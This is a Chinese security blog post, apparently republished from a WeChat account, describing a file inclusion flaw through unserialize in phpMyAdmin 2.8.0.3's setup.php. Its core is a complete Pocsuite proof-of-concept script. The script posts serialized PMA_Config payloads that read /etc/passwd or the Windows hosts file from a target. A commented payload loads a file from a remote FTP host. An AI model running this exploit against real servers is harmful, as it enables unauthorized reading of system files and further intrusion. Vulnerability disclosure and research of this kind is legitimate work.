0x01 代码审计
漏洞的文件 /scripts/setup.php
第10行和第28行:
传入的configuration
给反序列化,而这个setup.php
中引入了common.lib.php
来到common.lib.php
第555行:
common.lib.php
中引入了Config.class.php
再看看Config.class.php 284行:
最后load方法:
0x02 漏洞复现
POC:
#!/usr/bin/env python
# coding: utf-8
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
import re
class TestPOC(POCBase):
vulID = '1' # ssvid
version = '1.0'
author = ['whoam1']
vulDate = '2016-04-23'
createDate = '2016-08-24'
updateDate = '2016-08-24'
references = ['http://www.seebug.org/vuldb/ssvid-']
name = 'phpmyadmin unserialize getshell'
appPowerLink = 'https://www.phpmyadmin.net/'
appName = 'phpmyadmin'
appVersion = '2.8.0.3'
vulType = '文件包含'
desc = '''
/scripts/setup.php
'''
samples = ['']
install_requires = ['']
#请尽量不要使用第三方库,必要时参考 https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md#poc-第三方模块依赖说明 填写该字段
def _attack(self):
#configuration=O:10:"PMA_Config":1:{s:6:"source",s:38:"ftp://user:[email protected]/ftp.txt";}&action=test
self._verify()
def _verify(self):
result = {}
requ = req.get(self.url)
coo = re.compile(r"'phpMyAdmin=(.*?);")
cookie = coo.findall(str(requ.headers))[0]
flag = re.compile(r"erver': '(.*?)',")
flags = flag.findall(str(requ.headers))[0]
vul_url = self.url+'/scripts/setup.php'
header ={'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','cookie':'phpMyAdmin='+str(cookie),'Content-Type': 'application/x-www-form-urlencoded','User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'}
if '(' in flags:
poc = 'configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}&action=test'
req_post = req.post(vul_url,headers=header,data=poc)
if '/bin/bash' in req_post.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_output(result)
else:
poc = 'configuration=O:10:"PMA_Config":1:{s:6:"source",s:37:"c:/windows/system32/drivers/etc/hosts";}&action=test'
req_post = req.post(vul_url,headers=header,data=poc)
if 'Windows' in req_post.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_output(result)
def parse_output(self, result):
#parse output
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)
0x03 修复方案
升级为最新版本
本文始发于微信公众号(飓风网络安全):Phpmyadmin2.8.0.3任意文件包含漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论